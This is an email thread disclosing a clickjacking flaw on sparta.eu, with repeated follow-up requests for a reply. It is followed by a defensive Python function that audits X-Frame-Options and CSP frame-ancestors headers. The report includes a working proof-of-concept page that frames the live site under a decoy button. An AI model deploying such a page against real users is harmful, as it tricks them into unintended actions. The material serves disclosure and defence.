Hello Team,
Please give me a response regarding this issue please.
On Tue, Apr 5, 2022 at 4:56 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
Hello Team,
Please give me a response on this issue.
On Tue, Mar 1, 2022 at 9:26 PM Sakshi Patil <sakshipatil017(a)gmail.com>
wrote:
> Sir, any update?
>
> On Sun, Nov 22, 2020 at 8:16 PM Sakshi Patil <sakshipatil017(a)gmail.com>
> wrote:
>
>> *Vulnerability Name : Click jacking*
>>
>> Target URL: https://www.sparta.eu/
>>
>> Vulnerability Description :
>> Click jacking (User Interface redress attack, UI redress attack, UI
>> redressing) is a malicious technique of tricking a Web user into clicking
>> on something different from what the user perceives they are clicking on,
>> thus potentially revealing confidential information or taking control of
>> their computer while clicking on seemingly innocuous web pages.
>>
>> The server didn't return an X-Frame-Options header which means that this
>> website could be at risk of a click jacking attack. The X-Frame-Options
>> HTTP response header can be used to indicate whether or not a browser
>> should be allowed to render a page in a <frame> or <iframe>. Sites can use
>> this to avoid click jacking attacks, by ensuring that their content is not
>> embedded into other sites.
>>
>> Typically there is one type of attack - cross site request forgeries
>> (CSRF) that can interact with functions on other websites.
>>
>> 1) This vulnerability affects Web Server.
>> <html>
>> <head>
>> <title>Clickjack test page</title>
>> </head>
>> <style>
>> #myBtn{
>> z-index: 999;
>> position: absolute;
>> top: 100px;
>> right: 50px;
>> color: white;
>> background-color: red;
>> }
>> </style>
>> <body>
>> <!-- <h1> A Sample Test Page </h1>
>> <p>Website is vulnerable to click jacking! </p>
>> <p>Avoid random clicks </p> -->
>> <div style="z-index:-9999; position:absolute;top:0; left:0;width: 70%;
>> height:70%">
>> <iframe src="https://www.sparta.eu/" id="frame1" width="100%"
>> height="100%">
>> </iframe></div>
>> <div align="right" style="position:absolute; top:1; left:0; z-index:1;
>> width: 70%;height:60%; text-align:left;">
>>
>> <a href="https://www.sparta.eu/" target="_blank"><button id="myBtn">click here</button></a>
>> <!-- <a href="https://www.sparta.eu/"><button id="myBtn">Open Modal</button></a> -->
>> <div id="myModal" class="modal">
>> <!-- Modal content -->
>> </div>
>> </div>
>> </body>
>> </html>
>>
>> 2. Save it as <any name>.html, e.g. s.html
>>
>> 3. Then simply open it and click on the button (direct login); it
>> redirects to https://www.sparta.eu/
>> As far as I know, this data is enough to prove that your site is
>> vulnerable to click jacking.
>>
>> Impact:
>> An attacker may trick a user by sending them a malicious link; the user then
>> opens it, clicks some image, and their account has unconsciously been deactivated.
>>
>> Attachment:
>>
>
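
The report's central finding is a missing X-Frame-Options header. As an added example (not part of the original thread), the Python function below classifies a response's anti-framing headers; it also covers the CSP frame-ancestors directive, which the report does not mention. The function names, verdict labels and sample headers are constructed for illustration.

```python
# Added example: audit a response's anti-framing headers. All sample data is constructed.

def frame_ancestors(csp):
    """Return the frame-ancestors source list from a CSP header value, or None."""
    for directive in csp.split(";"):
        parts = directive.split()
        # Assumption of this example: a directive with no sources counts as absent.
        if len(parts) > 1 and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def framing_policy(headers):
    """Classify headers as deny, same-origin, allow-list, invalid or unprotected."""
    h = {name.lower(): value for name, value in headers.items()}
    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        # An enforced frame-ancestors directive replaces X-Frame-Options in browsers.
        if sources == ["'none'"]:
            return "deny"
        if sources == ["'self'"]:
            return "same-origin"
        # A bare wildcard or scheme lets arbitrary sites frame the page.
        if any(s in ("*", "http:", "https:") for s in sources):
            return "unprotected"
        return "allow-list"
    if "x-frame-options" not in h:
        return "unprotected"
    # A header sent twice reaches us comma-joined; keep the distinct values.
    values = {v.strip().lower() for v in h["x-frame-options"].split(",") if v.strip()}
    if values == {"deny"}:
        return "deny"
    if values == {"sameorigin"}:
        return "same-origin"
    # ALLOW-FROM (obsolete), typos and conflicting values are reported for repair.
    return "invalid"


SAMPLES = {  # constructed header sets, not captured from any real site
    "no headers": {"Content-Type": "text/html"},
    "xfo deny": {"X-Frame-Options": "DENY"},
    "xfo allow-from": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "csp self": {"content-security-policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp wildcard": {"Content-Security-Policy": "frame-ancestors *", "X-Frame-Options": "DENY"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:15} -> {framing_policy(hdrs)}")
```

A verdict of "unprotected" or "invalid" is the condition to fix on the server, by sending either `X-Frame-Options: DENY`/`SAMEORIGIN` or a `frame-ancestors` directive.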